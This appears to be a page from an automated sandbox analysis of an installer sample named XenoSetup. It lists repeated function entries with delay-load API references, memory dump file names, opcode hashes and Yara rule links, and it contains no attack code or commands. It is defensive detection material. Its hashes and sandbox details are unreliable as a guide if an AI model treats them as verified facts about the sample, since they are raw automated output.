Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430

Function 00FFE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 81f0fe9ef69c0bdd273e350225d7bc9ad56b565910c8d212c92e8878d0833fa0
Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
Opcode Fuzzy Hash: 81f0fe9ef69c0bdd273e350225d7bc9ad56b565910c8d212c92e8878d0833fa0
Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430

Function 00FFE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 97679990c1f561b6b9d6985a503085da95f6a324b2d205699f57360f20b7c4b5
Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
Opcode Fuzzy Hash: 97679990c1f561b6b9d6985a503085da95f6a324b2d205699f57360f20b7c4b5
Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430

Function 00FFE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c787e8bcdc23c8c0aa86ae7fe1374ceb5327f037cd6517df53cc814a40c26ce7
Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
Opcode Fuzzy Hash: c787e8bcdc23c8c0aa86ae7fe1374ceb5327f037cd6517df53cc814a40c26ce7
Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430

Function 00FFE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 17a0fee477acf33820df0ee1f998a4220da95cf1b2c0581b3e84cd8b2a2464ed
Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
Opcode Fuzzy Hash: 17a0fee477acf33820df0ee1f998a4220da95cf1b2c0581b3e84cd8b2a2464ed
Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430

Function 00FFE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2d3ca26e38f3fa6f9004f72da0aa62681c3667c2aa8b4f70fbdf16e17f159d03
Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
Opcode Fuzzy Hash: 2d3ca26e38f3fa6f9004f72da0aa62681c3667c2aa8b4f70fbdf16e17f159d03
Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430

Function 00FFE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5b0a6cae135ff9e0e2fdf6a6bbc6465396c369df283dadd15c68fc9d61fd99b9
Instruction ID: 20d1adad51d5084b0534c49e16e0e486da895331e82cf00c237e57f1df9df22c
Opcode Fuzzy Hash: 5b0a6cae135ff9e0e2fdf6a6bbc6465396c369df283dadd15c68fc9d61fd99b9
Instruction Fuzzy Hash: 9AA012E21942453C300821011D06C37020CC8C0F20330441DF511940745C4418002432

Function 00FFE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5a4135b0cd41e925a13bf417340f8b2bb193d3663e37369f2a5593afc14a8982
Instruction ID: a6e0911b2c48ed798110c79d4deb1d7a067a34b3c9216f702add9c4c3e6a63fa
Opcode Fuzzy Hash: 5a4135b0cd41e925a13bf417340f8b2bb193d3663e37369f2a5593afc14a8982
Instruction Fuzzy Hash: E2A012E21982457C300821011D06C37020CC8C4F60330481DF50284074584418002432

Function 00FFE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1bdd1992f27cabee0708f049aaf47f3dbd4fc24140eefe6de70720c3edd0f09a
Instruction ID: a6e0911b2c48ed798110c79d4deb1d7a067a34b3c9216f702add9c4c3e6a63fa
Opcode Fuzzy Hash: 1bdd1992f27cabee0708f049aaf47f3dbd4fc24140eefe6de70720c3edd0f09a
Instruction Fuzzy Hash: E2A012E21982457C300821011D06C37020CC8C4F60330481DF50284074584418002432

Function 00FFE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 963a464895229a31d9893f3407fd7a0f66622477bdc7287608ab2eb6c8b615a7
Instruction ID: a6e0911b2c48ed798110c79d4deb1d7a067a34b3c9216f702add9c4c3e6a63fa
Opcode Fuzzy Hash: 963a464895229a31d9893f3407fd7a0f66622477bdc7287608ab2eb6c8b615a7
Instruction Fuzzy Hash: E2A012E21982457C300821011D06C37020CC8C4F60330481DF50284074584418002432

Function 00FFE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fd5f21a4ca583290281d81e4e6d8989fc3f28befb62bdcde750324fe8ed06027
Instruction ID: a6e0911b2c48ed798110c79d4deb1d7a067a34b3c9216f702add9c4c3e6a63fa
Opcode Fuzzy Hash: fd5f21a4ca583290281d81e4e6d8989fc3f28befb62bdcde750324fe8ed06027
Instruction Fuzzy Hash: E2A012E21982457C300821011D06C37020CC8C4F60330481DF50284074584418002432

Function 00FFE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8e74d8b8b17308c44455fab9afaa70b0e508701297c03530b35b42a8cd7a48c3
Instruction ID: a6e0911b2c48ed798110c79d4deb1d7a067a34b3c9216f702add9c4c3e6a63fa
Opcode Fuzzy Hash: 8e74d8b8b17308c44455fab9afaa70b0e508701297c03530b35b42a8cd7a48c3
Instruction Fuzzy Hash: E2A012E21982457C300821011D06C37020CC8C4F60330481DF50284074584418002432

Function 00FFE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE580

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a136c979cfa69bc14a8c45889efa40a62a943f30040943ed023d79cb81132f2a
Instruction ID: 96b6b904cd8c7aa22c1bb75306490a47b2c9326f60d78507916dd4935919af56
Opcode Fuzzy Hash: a136c979cfa69bc14a8c45889efa40a62a943f30040943ed023d79cb81132f2a
Instruction Fuzzy Hash: A5A012C21982097C300421511D02C37010CC8C4F60334481DF502C8074A84418102430

Function 00FFE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE580

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 691ced74ab69747045207ce1d541026605617e8b85109c2606610ced74be5661
Instruction ID: 96b6b904cd8c7aa22c1bb75306490a47b2c9326f60d78507916dd4935919af56
Opcode Fuzzy Hash: 691ced74ab69747045207ce1d541026605617e8b85109c2606610ced74be5661
Instruction Fuzzy Hash: A5A012C21982097C300421511D02C37010CC8C4F60334481DF502C8074A84418102430

Function 00FFE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE580

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5a1d3075d8e3b5630638d8e39adb5079b68bfce2442fb86efceda20f9f52023c
Instruction ID: 765b45e09c3c6b8df23b622de953ce2bb9477bee1c1e5f32503632fff884a578
Opcode Fuzzy Hash: 5a1d3075d8e3b5630638d8e39adb5079b68bfce2442fb86efceda20f9f52023c
Instruction Fuzzy Hash: 41A012C21D42083C300421611D02C37050CC8C0F21334451DF501C8074A84418102430

Function 00FFE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: da51888f44360b5599d1d821925260737f332e85ca0394c8f2865876391b379b
Instruction ID: d488b4f07fc338133a073180439fdbf2927b146207f0979a0585a78e769473ca
Opcode Fuzzy Hash: da51888f44360b5599d1d821925260737f332e85ca0394c8f2865876391b379b
Instruction Fuzzy Hash: 03A012C25991057C310421011D02C3B010CC8C5F60334481DF502C407968481C002430

Function 00FFE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 25bdb14fee60e4ef7081919bbf33bfdfd108a4f10fd4b0b3518e05c1b49621c1
Instruction ID: d488b4f07fc338133a073180439fdbf2927b146207f0979a0585a78e769473ca
Opcode Fuzzy Hash: 25bdb14fee60e4ef7081919bbf33bfdfd108a4f10fd4b0b3518e05c1b49621c1
Instruction Fuzzy Hash: 03A012C25991057C310421011D02C3B010CC8C5F60334481DF502C407968481C002430

Function 00FFE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
